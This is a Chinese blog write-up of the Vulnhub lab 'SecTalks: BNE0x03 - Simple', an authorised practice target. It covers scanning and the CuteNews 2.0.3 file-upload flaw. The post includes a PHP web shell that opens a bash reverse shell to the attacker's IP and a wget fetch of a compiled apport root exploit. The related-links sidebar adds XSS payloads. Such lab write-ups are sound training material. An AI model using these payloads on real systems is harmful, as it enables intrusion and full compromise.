红队打靶练习:SECTALKS: BNE0X03 - SIMPLE

最新推荐文章于 2023-12-27 14:18:35 发布
最新推荐文章于 2023-12-27 14:18:35 发布
阅读量423 收藏 10
点赞数 8
分类专栏: Vulnhub 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/134998402
版权

信息收集

1、arp探测
来探测本地接口的存活主机

┌──(root㉿ru)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.11.81
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1    fc:86:2a:4a:6f:ec       Huawei Device Co., Ltd.
192.168.11.15   30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.36   3c:55:76:dc:ab:f5       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.11.46   14:de:39:c3:4f:31       Huawei Device Co., Ltd.
192.168.11.22   e0:d0:45:5c:f5:53       Intel Corporate
192.168.11.33   f4:a4:75:fe:6b:2c       Intel Corporate
192.168.11.68   7c:b5:66:a5:f0:a5       Intel Corporate
192.168.11.86   00:0c:29:cc:9c:f1       VMware, Inc.
192.168.11.18   3c:e9:f7:c0:ef:c7       Intel Corporate
192.168.11.20   3c:21:9c:fd:7b:6d       Intel Corporate
2、netdiscover
netdiscover -r 192.168.11.0/24 

 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                        
                                                                                                                                      
 11 Captured ARP Req/Rep packets, from 9 hosts.   Total size: 660                                                                     
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.11.1    fc:86:2a:4a:6f:ec      3     180  Huawei Device Co., Ltd.                                                            
 192.168.11.36   3c:55:76:dc:ab:f5      1      60  CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.                                       
 192.168.11.22   e0:d0:45:5c:f5:53      1      60  Intel Corporate                                                                    
 192.168.11.33   f4:a4:75:fe:6b:2c      1      60  Intel Corporate                                                                    
 192.168.11.20   3c:21:9c:fd:7b:6d      1      60  Intel Corporate                                                                    
 192.168.11.46   14:de:39:c3:4f:31      1      60  Huawei Device Co., Ltd.                                                            
 192.168.11.86   00:0c:29:cc:9c:f1      1      60  VMware, Inc.                                                                       
 192.168.11.68   7c:b5:66:a5:f0:a5      1      60  Intel Corporate                                                                    
 192.168.11.69   e6:bf:32:e2:1b:48      1      60  Unknown vendor
3、nmap
主机存活探测

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sn 192.168.11.0/24 --min-rate 10000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:27 CST
Nmap scan report for 192.168.11.1
Host is up (0.0092s latency).
MAC Address: FC:86:2A:4A:6F:EC (Huawei Device)
Nmap scan report for 192.168.11.15
Host is up (0.13s latency).
MAC Address: 30:03:C8:49:52:4D (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.20
Host is up (0.12s latency).
MAC Address: 3C:21:9C:FD:7B:6D (Intel Corporate)
Nmap scan report for 192.168.11.22
Host is up (0.12s latency).
MAC Address: E0:D0:45:5C:F5:53 (Intel Corporate)
Nmap scan report for 192.168.11.33
Host is up (0.12s latency).
MAC Address: F4:A4:75:FE:6B:2C (Intel Corporate)
Nmap scan report for 192.168.11.36
Host is up (0.00016s latency).
MAC Address: 3C:55:76:DC:AB:F5 (Cloud Network Technology Singapore PTE.)
Nmap scan report for 192.168.11.46
Host is up (0.024s latency).
MAC Address: 14:DE:39:C3:4F:31 (Huawei Device)
Nmap scan report for 192.168.11.68
Host is up (0.11s latency).
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)
Nmap scan report for 192.168.11.69
Host is up (0.12s latency).
MAC Address: E6:BF:32:E2:1B:48 (Unknown)
Nmap scan report for 192.168.11.86
Host is up (0.00014s latency).
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Nmap scan report for 192.168.11.81
Host is up.
Nmap done: 256 IP addresses (11 hosts up) scanned in 0.77 seconds

端口探测

┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.11.86 --min-rate 10000  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:28 CST
Nmap scan report for 192.168.11.86
Host is up (0.0015s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:CC:9C:F1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds


信息探测

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p80 192.168.11.86 --min-rate 10000 -oA xx  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:31 CST
Nmap scan report for 192.168.11.86
Host is up (0.00028s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)
MAC Address: 00:0C:29:CC:9C:F1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds

-sC : 以默认脚本进行扫描
-sV : 扫描各系统以及服务版本
-sT : 以tcp扫描进行探测
-O  : 整体进行探测
-p  : 指定端口
--min-rate 10000 : 以一万的速率进行扫描

udp探测

┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.11.86 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:29 CST
Nmap scan report for 192.168.11.86
Host is up (0.00023s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
682/udp   closed xfr
772/udp   closed cycleserv2
9103/udp  closed bacula-sd
20518/udp closed unknown
41774/udp closed unknown
49179/udp closed unknown
MAC Address: 00:0C:29:CC:9C:F1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds


漏洞探测

┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p80 192.168.11.86 --min-rate 10000                                                                        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 14:34 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.11.86
Host is up (0.00065s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.11.86
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.11.86:80/
|     Form id: login_form
|     Form action: /index.php
|     
|     Path: http://192.168.11.86:80/?register
|     Form id: regpassword
|     Form action: /index.php?register
|     
|     Path: http://192.168.11.86:80/?register&lostpass
|     Form id: 
|     Form action: /index.php
|     
|     Path: http://192.168.11.86:80/index.php
|     Form id: login_form
|     Form action: /index.php
|     
|     Path: http://192.168.11.86:80/index.php?register
|     Form id: regpassword
|_    Form action: /index.php?register
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /rss.php: RSS or Atom feed
MAC Address: 00:0C:29:CC:9C:F1 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 344.99 seconds
4、nikto
┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.11.86 nikto.txt       
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.11.86
+ Target Hostname:    192.168.11.86
+ Target Port:        80
+ Start Time:         2023-11-27 14:35:16 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ /: Cookie CUTENEWS_SESSION created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.6.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /docs/: Directory indexing found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ /README.md: Readme Found.
+ 8103 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2023-11-27 14:35:31 (GMT8) (15 seconds)
---------------------------------------------------------------------------

目录探测

1、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.11.86 -w directory-list-lowercase-2.3-medium.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.11.86
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/docs                 (Status: 301) [Size: 312] [--> http://192.168.11.86/docs/]
/uploads              (Status: 301) [Size: 315] [--> http://192.168.11.86/uploads/]
/skins                (Status: 301) [Size: 313] [--> http://192.168.11.86/skins/]
/core                 (Status: 301) [Size: 312] [--> http://192.168.11.86/core/]
/cdata                (Status: 301) [Size: 313] [--> http://192.168.11.86/cdata/]
/server-status        (Status: 403) [Size: 293]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================
2、dirb
└─# cat dirb.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: /root/lianxi/dirb.txt
START_TIME: Mon Nov 27 17:19:21 2023
URL_BASE: http://192.168.11.86/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.11.86/ ----
==> DIRECTORY: http://192.168.11.86/core/
==> DIRECTORY: http://192.168.11.86/docs/
+ http://192.168.11.86/favicon.ico (CODE:200|SIZE:1150)
+ http://192.168.11.86/index.php (CODE:200|SIZE:2487)
+ http://192.168.11.86/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://192.168.11.86/skins/
==> DIRECTORY: http://192.168.11.86/uploads/

---- Entering directory: http://192.168.11.86/core/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.11.86/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.11.86/skins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.11.86/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon Nov 27 17:19:25 2023
DOWNLOADED: 4612 - FOUND: 3
3、dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.11.86 -e* -o /root/lianxi/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490

Output File: /root/lianxi/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-11-27_17-19-56.log

Target: http://192.168.11.86/

[17:19:56] Starting:                                         
[17:19:58] 403 -  285B  - /.php3                                           
[17:20:00] 200 -    3KB - /LICENSE.txt                                      
[17:20:00] 200 -    2KB - /README.md                                        
[17:20:12] 301 -  312B  - /core  ->  http://192.168.11.86/core/             
[17:20:13] 200 -    1KB - /docs/                                            
[17:20:13] 301 -  312B  - /docs  ->  http://192.168.11.86/docs/             
[17:20:14] 200 -   12KB - /example.php                                      
[17:20:14] 200 -    1KB - /favicon.ico                                      
[17:20:17] 200 -    2KB - /index.php                                        
[17:20:17] 200 -    2KB - /index.php/login/                                 
[17:20:24] 200 -   28B  - /print.php                                        
[17:20:26] 200 -  105B  - /rss.php                                          
[17:20:26] 200 -    5KB - /search.php                                       
[17:20:26] 403 -  293B  - /server-status                                    
[17:20:26] 403 -  294B  - /server-status/                                   
[17:20:28] 301 -  313B  - /skins  ->  http://192.168.11.86/skins/           
[17:20:31] 301 -  315B  - /uploads  ->  http://192.168.11.86/uploads/       
[17:20:31] 200 -  743B  - /uploads/                                         
                                                                             
Task Completed
4、feroxbuster
feroxbuster -u http://192.168.11.86 -x php -w 字典

whatweb

┌──(root㉿ru)-[~/lianxi]
└─# whatweb http://192.168.11.86/               
http://192.168.11.86/ [200 OK] 
Apache[2.4.7], Cookies[CUTENEWS_SESSION], Country[RESERVED][ZZ], 
HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.11.86],
PHP[5.5.9-1ubuntu4.6], PasswordField[password], Script[text/javascript],
Title[Please Login / CuteNews], UncommonHeaders[accept-charset], 
X-Frame-Options[sameorigin], X-Powered-By[PHP/5.5.9-1ubuntu4.6]

WEB

1、cms

显而易见,这是一套内容管理系统,既然给了cms的名称和版本。说明很可能存在漏洞。
2、searchsploit
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit CuteNews 2.0.3                            
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
CuteNews 2.0.3 - Arbitrary File Upload                                                               | php/webapps/37474.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


poc

┌──(root㉿ru)-[~/lianxi]
└─# cat 37474.txt 
          CuteNews 2.0.3 Remote File Upload Vulnerability
        =================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm T0x!c member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3]
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de  , Ghosty , Ked ans , Caddy-dz .....
==========================================================
 # Exploit  :

Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal

 1 - Sign up for New User
 2 - Log In
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php

-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\

6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php

 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php


根据poc我们大概知道,首先让我们先创建一个账号登录上去,然后利用文件上传漏洞,进行上传shell。然后开启监听,等待反弹shell即可。

反弹shell

1、payload
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.11.81/3636 0>&1'"); ?>
2、上传

上传成功!
3、反弹shell
点击payload

┌──(root㉿ru)-[~/lianxi]
└─# nc -lvnp 3636
listening on [any] 3636 ...
connect to [192.168.11.81] from (UNKNOWN) [192.168.11.86] 36287
bash: cannot set terminal process group (1184): Inappropriate ioctl for device
bash: no job control in this shell
www-data@simple:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@simple:/var/www/html/uploads$ pwd
pwd
/var/www/html/uploads
www-data@simple:/var/www/html/uploads$

提权

内核提权
www-data@simple:/home/bull$ uname -a
uname -a
Linux simple 3.16.0-30-generic #40~14.04.1-Ubuntu SMP Thu Jan 15 17:45:15 UTC 2015 i686 athlon i686 GNU/Linux
www-data@simple:/home/bull$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 14.04.2 LTS
Release:        14.04
Codename:       trusty
www-data@simple:/home/bull$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@simple:/home/bull$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/sbin/uuidd
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/at
/usr/bin/passwd
/bin/fusermount
/bin/su
/bin/ping6
/bin/ping
/bin/mount
/bin/umount
www-data@simple:/home/bull$ 

www-data@simple:/tmp$ wget http://192.168.11.86:8080/37088.c
wget http://192.168.11.86:8080/37088.c
--2023-11-27 03:12:14--  http://192.168.11.86:8080/37088.c
Connecting to 192.168.11.86:8080... failed: Connection refused.
www-data@simple:/tmp$ wget http://192.168.11.81:8080/37088.c
wget http://192.168.11.81:8080/37088.c
--2023-11-27 03:12:33--  http://192.168.11.81:8080/37088.c
Connecting to 192.168.11.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6027 (5.9K) [text/x-csrc]
Saving to: '37088.c'

     0K .....                                                 100% 1.02G=0s

2023-11-27 03:12:33 (1.02 GB/s) - '37088.c' saved [6027/6027]

www-data@simple:/tmp$ ls -al
ls -al
total 16
drwxrwxrwt  2 root     root     4096 Nov 27 03:12 .
drwxr-xr-x 21 root     root     4096 Sep  9  2015 ..
-rw-r--r--  1 www-data www-data 6027 Nov 27  2023 37088.c
www-data@simple:/tmp$ chmod +x 37088.c
chmod +x 37088.c
www-data@simple:/tmp$ gcc 37088.c -o 37088  
gcc 37088.c -o 37088
www-data@simple:/tmp$ ls
ls
37088
37088.c
www-data@simple:/tmp$ ./37088  
./37088
created /var/crash/_bin_sleep.33.crash
crasher: my pid is 1585
apport stopped, pid = 1586
getting pid 1585
current pid = 1584..2500..5000..7500..10000..12500..15000..17500..20000..22500..25000..27500..30000..32500..
** child: current pid = 1585
** child: executing /bin/su
su: must be run from a terminal
sleeping 2s..

checker: mode 4516
waiting for file to be unlinked..writing to fifo
fifo written.. wait...
waiting for /etc/sudoers.d/core to appear..

checker: new mode 32768 .. done
checker: SIGCONT
checker: writing core
checker: done
success
stty: standard input: Inappropriate ioctl for device
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
get flag
# cd /root
# ls
flag.txt
# cat flag.txt
U wyn teh Interwebs!!1eleven11!!1!
Hack the planet!
#
真的学不了一点。。。
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
汗的博客
04-21 539
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录靶机地址及相关描述靶机地址靶机描述Simple CTFLocationHints靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 靶机地址 https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/ 靶机描述 Simpl...
xss靶场练习
qq_46804551的博客
11-02 242
- Pass-1 127.0.0.1/xss/level1.php?name=<script>alert(1)</script> 通过 - Pass-2 直接插入不行,引号将其包裹起了 http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script><-- - Pass-3 审查元素看看 看似和2没啥区别 但与level2不同的是,value做了校验,双引号和尖括号都
第七周靶场练习及心得
Vicissitud的博客
03-10 81
第七周靶场练习及心得
红队打靶BNE0X03_SIMPLE打靶思路详解(vulnhub)
Bossfrank的博客
07-21 426
本文是vulnhub靶机BNE0X03 SIMPLE的详细打靶过程。涉及到的知识点包括关于cms漏洞利用、文件上传漏洞、内核提权等。靶机较为容易,经典的攻击链,困难点在于如何选择合适的内核提权利用文件。
BNE0x03Simple
weixin_44770698的博客
12-27 443
靶场练习
SECTALKS: BNE0X03 - SIMPLE
Mysmycbx的博客
03-22 384
按照流程去uploads文件夹看看。40611.那就去试试。(尝试了好几个内核提权,全失败了,那试试其他方法)靶机端shell获取该文件,赋于执行权限,运行。发现是 cutenews cms 2.0.3。
uxubos:更新了Xubuntu OS 64位-开源
05-03
UXUBOS是Xubuntu的转载(http://xubuntu.org/)。该项目的主要目标很简单:只需安装一个更新的Xubuntu 64bit,即可安装,并提供多媒体支持,一些外观更改和最新的尖端软件!... 安装后无需下载数百兆字节!
红队备忘单:这是为了重新整理我的笔记
02-09
红队备忘单
corsica:CS411 红队 - 科西嘉岛网站
07-07
科西嘉安装 git clonenpm installnpm install -g nodemonmongod & nodemon server.jsAPI 文档使用以 api 为前缀的标准休息约定。 使用的路线 #return all the documentsGET /api/waitlists#return the specific ...
反向壳备忘单::upside-down_face:反向壳备忘单:upside-down_face:
01-30
网络安全领域,特别是渗透测试和红队操作中,反向壳(Reverse Shell)是一种常用的技巧,它允许攻击者在目标系统上建立一个后门,以便远程控制受害主机。本备忘单将深入探讨反向壳的概念、工作原理以及如何在不同...
Impost3r::ghost:Impost3r-一个Linux密码小偷
01-30
只有在获得明确授权进行渗透测试或红队活动时,才能合法地使用Impost3r。 ### 使用方法 1. **克隆项目**:首先,你需要从GitHub上克隆Impost3r的源代码仓库,命令如下: ``` git clone ...
SecTalks: BNE0x03 - Simple靶机
小小猪的博客
06-11 311
SecTalks: BNE0x03 - Simple靶机 arp-scan -l 扫描靶机地址 nmap -sV -Pn -A x.x.x.235,扫描出80端口 访问80端口,尝试弱口令,无果 dirb http://x.x.x.235,扫描目录,发现uploads nikto 进行扫描漏洞 发现可以注册信息,注册之后可以修改,有文件上传处,上传木马 发现上传成功 端口监听,得到权限 产看poc ,发现没有,https://www.exploit-d.
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8367
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业)
08-06
基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业)含有代码注释,新手也可看懂,个人手打98分项目,导师非常认可的项目,期末大作业和课程设计高分必看,下载下来,简单部署,就可以使用。 基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业) 基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业) 基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业) 基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业) 基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业) 基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业) 基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业)基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明(大作业)基于Python+OpenCV实现双目立体视觉的图像匹配与测距代码+文档说明。
专卖店销售数据统计表(销售管理分析).xls
最新发布
08-06
销售管理表,财务报表,占比分析,消费能力分析,数据分析表,产品销售,客户关系 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
框架:战略思考、澄清与解码落地规划.pptx
08-06
框架:战略思考、澄清与解码落地规划.pptx
2021年最新易支付修复版源码/支持微信支付宝官方接口和码支付网信钱包等/个人也能用的易支付商户系统
08-06
安装环境介绍:Linux + Nginx1.1x +PHP7.2 +MySql5.6 集合了微信官方+支付宝官方+易商户+码支付+易通商户+网信钱包免签即时到账接口,让个人用户也能用上好用的易支付商户系统,系统自带10套基础模板。 修复短信注册,替换成阿里云短信 后台更改为上传Logo和Logo链接 后台登录密码不明文 清除平台统计数据 删除不必要功能,优化性能体验前台新增无需验证注册方式 删除不必要功能,优化性能体验 修复前台不能上传收款二维码功能 修复后台无法保存码支付ID和KEY到数据库
数据资产管理.ppt
08-06
数据资产管理.ppt
双鹤药业主数据管理平台建议书.pptx
08-06
双鹤药业主数据管理平台建议书.pptx
Windows红队持久性:注册表运行键技术解析
"这篇文档详细介绍了在Windows环境中如何利用注册表运行键来实现权限的持久化,这是红队渗透测试中常见的技术手段。文档强调了持久性在红队行动中的重要性,允许攻击者在不失去与C&C(指挥与控制)服务器连接的情况...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值